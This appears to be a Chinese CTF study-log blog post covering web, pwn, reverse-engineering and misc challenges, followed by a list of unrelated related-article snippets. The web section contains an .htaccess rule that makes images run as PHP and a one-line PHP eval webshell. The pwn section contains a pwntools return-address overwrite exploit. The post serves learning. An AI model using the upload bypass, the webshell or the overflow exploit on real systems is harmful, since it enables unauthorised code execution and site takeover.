2.19学习记录
Web
easyupload3.0
这是一道构造.htaccess文件的传马
如下:
<FilesMatch "jpg">SetHandler application/x-httpd-php
</FilesMatch>
.htaccess文件可以作为一个解释器,可以将传进去的图片马改为php马
上传之后再传个图片马,之后就可以蚁剑了
[极客大挑战 2019]Knife
根据提示构造木马
/?<?php eval($_POST["Syc"]);?>
之后用蚁剑连接即可
flag在根目录下
pwn
[BUUCTF]bjdctf_2020_babystack
先用exe看一下
64位的exe文件,用ida查看主调函数
分析代码发现在read处存在栈溢出
exp:
from pwn import *
io=remote('node2.anna.nssctf.cn',28733)
io.sendlineafter("name:",b'100')
payload=b'a'*(0x10+8)+p64(0x4006E6)
io.sendlineafter("name?",payload)
io.interactive()
re
[SWPUCTF 2021 新生赛]非常简单的逻辑题
题目
flag = 'xxxxxxxxxxxxxxxxxxxxx'
s = 'wesyvbniazxchjko1973652048@$+-&*<>'
result = ''
for i in range(len(flag)):s1 = ord(flag[i])//17s2 = ord(flag[i])%17result += s[(s1+i)%34]+s[-(s2+i+1)%34]
print(result)
# result = 'v0b9n1nkajz@j0c4jjo3oi1h1i937b395i5y5e0e$i'
题目的意思是在for循环中,对flag的ASCII值取整并赋给s1,对flag的ASCII值取余并赋给s2,在进行一个加密算法赋给result。
根据查询ai,分析思路:先在一定范围的ASCII值中,取整取余,分别赋给s1,s2
再定义一个函数命名为res,让其等于加密算法,此时的加密算法i已经不能再用i表示,替换成num
再写一个if判断,res与result的两两分组的值是否相等
exp:
flag = ''
s = 'wesyvbniazxchjko1973652048@$+-&*<>'
result = 'v0b9n1nkajz@j0c4jjo3oi1h1i937b395i5y5e0e$i'
res = ''
num = 0
for j in range(0,len(result),2):for i in range(255):s1 = i//17s2 = i%17res = s[(s1+num)%34]+s[-(s2+num+1)%34]if res == result[j:j+2]:flag += chr(i)num += 1
print(flag)
misc
[NISACTF 2022]huaji?
用010查看附件发现是个jfif文件
用随波逐流一把梭了
发现含有一个zip,内容是叫作flag的文档
用binwalk分出来,压缩包是加密的
得到的jpg查看一下exif,发现可疑信息
标记处猜一波是密码,结果还真是
相关文章:
2.19学习记录
Web easyupload3.0 这是一道构造.htaccess文件的传马 如下: <FilesMatch "jpg">SetHandler application/x-httpd-php </FilesMatch>.htaccess文件可以作为一个解释器,可以将传进去的图片马改为php马上传之后再传个图片马&#…...
汽车免拆诊断案例 | 2013 款奔驰 S300L 车起步时车身明显抖动
故障现象 一辆2013款奔驰S300L车,搭载272 946发动机,累计行驶里程约为15万km。车主反映,将挡位置于D挡,稍微释放一点制动踏板,车辆蠕动时车身明显抖动,类似气缸失火时的抖动,又类似手动变速器…...
【HeadFirst系列之HeadFirst设计模式】第5天之工厂模式:比萨店的秘密武器,轻松搞定对象创建!
工厂模式:比萨店的秘密武器,轻松搞定对象创建! 大家好,今天我们来聊聊设计模式中的工厂模式。如果你曾经为对象的创建感到头疼,或者觉得代码中到处都是 new 关键字,那么工厂模式就是你的救星!本…...
Redis如何解决热Key问题
目录 **如何解决 Redis 的热 Key(Hot Key)问题?****解决方案** **1. 使用多级缓存****方案** **2. 进行 Key 预分片(Key Sharding)****方案** **3. 使用 Redis 复制机制(主从复制或集群)****方案…...
从开发到部署:EasyRTC嵌入式视频通话SDK如何简化实时音视频通信的集成与应用
嵌入式设备和视频综合管理平台均支持B/S架构。在B/S架构下,传统的视频观看方式依赖于微软的OCX控件,然而OCX控件的使用正面临越来越多的挑战: 首先,用户需要安装浏览器插件、调整浏览器安全级别,并允许ActiveX控件弹出…...
如何在Zookeeper中实现分布式锁?)
Zookeeper(58)如何在Zookeeper中实现分布式锁?
在 Zookeeper 中实现分布式锁是一种常见的用例。Zookeeper 提供了强一致性、高可用性的分布式协调服务,使得它非常适合用来实现分布式锁。以下是详细的步骤和代码示例,展示如何在 Zookeeper 中实现分布式锁。 1. Zookeeper 分布式锁的基本原理 Zookeep…...
Mac端homebrew安装配置
拷打了一下午o3-mini-high,不如这位博主的超强帖子,10分钟结束战斗 跟随该文章即可,2025/2/19亲测可行 mac 安装HomeBrew(100%成功)_mac安装homebrew-CSDN博客文章浏览阅读10w次,点赞258次,收藏837次。一直觉得自己写…...
Spring 接入 DeepSeek
引入依赖 <dependency><groupId>org.springframework.ai</groupId><artifactId>spring-ai-openai-spring-boot-starter</artifactId> </dependency>2.yml配置 spring:ai:openai:api-key: sk-xxxxx // 填写自己申请的keybase-url: http…...
vscode将文件中行尾默认CRLF改为LF
安装prettier npm install --save-dev --save-exact prettier执行命令 npx prettier --write --end-of-line lf .即可将项目中的所有文件行尾序列格式改为lf *在你使用git拉取代码的时候,git会自动将代码当中与你当前系统不同的换行方式转化成你当前系统的换行方…...
python-leetcode 33.排序链表
题目: 给定链表的头结点head,请将其按升序排列,并返回排序后的链表 方法一:自顶向下归并排序 链表自顶向下归并排序的过程: 1.找到链表的中点,以中点为分界,将链表拆分成两个子链表。寻找链表的中点可以…...
【数据结构初阶第十二节】设计循环队列
云边有个稻草人-CSDN博客 必须有为成功付出代价的决心,然后想办法付出这个代价。 还有最后一道关于队列的习题,这题有点难,准备好迎接挑战吧! 目录 1.【题目】 2.实现循环队列推荐用数组,Why? 3.Q1:如…...
基于微信小程序的民宿短租系统设计与实现(ssm论文源码调试讲解)
第4章 系统设计 4.1系统设计的目标 系统设计的目标是满足用户的需求和满足系统实现所需要的所有要求。本系统收集了信息浏览、信息删除、信息添加、信息修改、信息查询为一体[17]。改变了用户民宿短租的方式,提高管理员管理效率以及用户预订的效率。为用户、房主提…...
使用 Jetty 构建 HTTPS 服务入门指南
在互联网安全越来越重要的今天,使用 HTTPS 为 Web 服务提供安全传输成为标准配置。Jetty 是一个高性能、易用且功能丰富的开源 Java HTTP 服务器和 Servlet 容器,能够轻松实现 HTTPS 支持。本文将结合代码实例,引导您快速搭建一个基于 Jetty 的 HTTPS 服务。 一、Jetty 简介…...
数据结构《图》
数据结构《图论》 图的性质 一、无向图(Undirected Graph) 定义 由一组顶点(Vertex)和一组无向边(Edge)构成。 每条无向边用一条无方向的线段连接两个顶点,记为 ( (u, v) ),其中…...
用Chrome Recorder轻松完成自动化测试脚本录制
前言 入门自动化测试,录制回放通常是小白测试首先用到的功能。而录制回放工具也一直是各大Web自动化测试必然会着重提供的一块功能。 早期WinRunner、QTP这样的工具,自动化测试可以说是围绕录制回放开展的。近年像Selenium也提供有录制工具 Selenium IDE,Playwright也包含…...
⭐️苹果电脑安装windows10双系统【详细图文步骤保姆级教程】【本教材适用于MAC台式机、笔记本MacBook air和pro】
苹果电脑安装windows10双系统【详细图文步骤保姆级教程】【本教材适用于MAC台式机、笔记本MacBook air和pro】 苹果电脑安装windows10双系统一、准备工作准备项1:U盘作为系统安装盘准备项2:您需要安装的系统镜像 二、启动转换助理步骤1:找到启…...
win10系统上的虚拟机安装麒麟V10系统提示找不到操作系统
目录预览 一、问题描述二、原因分析三、解决方案四、参考链接 一、问题描述 win10系统上的虚拟机安装麒麟V10系统提示找不到操作系统,报错:Operating System not found 二、原因分析 国产系统,需要注意的点: 需要看你的系统类…...
Java 大视界 -- 开源社区对 Java 大数据发展的推动与贡献(91)
💖亲爱的朋友们,热烈欢迎来到 青云交的博客!能与诸位在此相逢,我倍感荣幸。在这飞速更迭的时代,我们都渴望一方心灵净土,而 我的博客 正是这样温暖的所在。这里为你呈上趣味与实用兼具的知识,也…...
深入浅出C语言内存模型——高阶篇
在C语言编程的征途上,内存管理无疑是最具挑战性的部分之一。今天,我们将深入探讨C语言的内存模型,剖析其高级特性,并通过一系列案例,助你成为内存管理的佼佼者。本文为高阶篇,适合已经有一定C语言基础的读者…...
AI 百炼成神:逻辑回归, 垃圾邮件分类
第二个项目:逻辑回归垃圾邮件分类 项目代码下载地址:https://download.csdn.net/download/m0_56366541/90398247 项目目标 学习逻辑回归的基本概念。使用逻辑回归算法来实现垃圾邮件的分类。理解如何处理文本数据以及如何评估分类模型的性能。项目步骤 准备数据集 我们将使…...
游戏资源编辑新手指南:用ExtractorSharp打造个性化游戏补丁
游戏资源编辑新手指南:用ExtractorSharp打造个性化游戏补丁 【免费下载链接】ExtractorSharp Game Resources Editor 项目地址: https://gitcode.com/gh_mirrors/ex/ExtractorSharp 你是否厌倦了游戏中千篇一律的角色外观?是否梦想为心爱的游戏角…...
StarRailCopilot终极教程:5分钟快速上手崩坏星穹铁道全自动脚本
StarRailCopilot终极教程:5分钟快速上手崩坏星穹铁道全自动脚本 【免费下载链接】StarRailCopilot 崩坏:星穹铁道脚本 | Honkai: Star Rail auto bot (简体中文/繁體中文/English/Espaol) 项目地址: https://gitcode.com/gh_mirrors/st/StarRailCopilo…...
从SAR图像看海风:手把手教你用Bragg散射模型理解海面粗糙度与雷达回波
从SAR图像看海风:手把手教你用Bragg散射模型理解海面粗糙度与雷达回波 当Sentinel-1卫星的合成孔径雷达(SAR)扫过海面时,图像上那些明暗交错的纹理并非随机噪声,而是海风与波浪的"指纹"。本文将带您透过灰度…...
Windows蓝屏0xE6?别慌,手把手教你用WinDbg分析DRIVER_VERIFIER_DMA_VIOLATION
Windows蓝屏0xE6故障全解析:从Dump分析到驱动修复实战 突然遭遇蓝屏,屏幕上赫然显示着"DRIVER_VERIFIER_DMA_VIOLATION (0xE6)"的错误代码,这可能是许多Windows用户最不愿看到的场景之一。不同于普通应用崩溃,这类涉及驱…...
postgresql 拼接字段
postgresql 文档表有两个字段,tag1和tag2,两个字段存储的都是标签,多个标签用逗号分隔。现在需要用逗号连接tag1和tag2,作为一个tag字段返回。在 PostgreSQL 中,直接拼接 tag1 || , || tag2 很容易产生多余逗号、首尾逗…...
IgH EtherCAT 从入门到精通:第 25 章 添加新的邮箱协议
第 25 章 添加新的邮箱协议 导读摘要:当你需要支持一个新的 EtherCAT 邮箱协议时,IgH Master 提供了清晰的扩展框架。本章将以添加一个假想协议为例,讲解 FSM 实现、ioctl 接口扩展、命令行工具扩展和编译系统集成的完整流程。 25.1 邮箱协议扩展框架 回顾第 21 章的邮箱架…...
刷到无数农村帮扶暖心瞬间,藏着最朴素的善意与坚守
常年和互联网打交道,我总习惯在忙碌的间隙,刷一刷各大平台的农村帮扶视频。没有华丽的剪辑,没有刻意的炒作,那些扎根乡村的帮扶者、默默付出的普通人,总能轻易触动心底最柔软的地方,也让我在浮躁的行业里&a…...
ARM架构EL2虚拟定时器寄存器原理与应用详解
1. ARM架构下EL2虚拟定时器寄存器深度解析在ARMv8-A架构的虚拟化环境中,定时器管理是Hypervisor实现精确调度的核心机制之一。作为系统开发者,理解EL2特权级的虚拟定时器寄存器工作原理,对于构建高效可靠的虚拟化平台至关重要。本文将深入剖析…...
新手必看:Ollama部署translategemma-27b-it图文翻译模型常见QA
新手必看:Ollama部署translategemma-27b-it图文翻译模型常见QA 1. 什么是translategemma-27b-it模型? translategemma-27b-it是由Google基于Gemma 3模型系列开发的轻量级开源翻译模型。它专门针对55种语言之间的翻译任务进行了优化,具有以下…...
RWKV7-1.5B-world轻量级方案:对比Gemma-2B,RWKV7在中文基础任务few-shot学习表现
RWKV7-1.5B-world轻量级方案:对比Gemma-2B,RWKV7在中文基础任务few-shot学习表现 1. 模型概述 1.1 RWKV7-1.5B-world核心特性 RWKV7-1.5B-world是基于第7代RWKV架构的轻量级双语对话模型,拥有15亿参数。该模型采用线性注意力机制替代传统T…...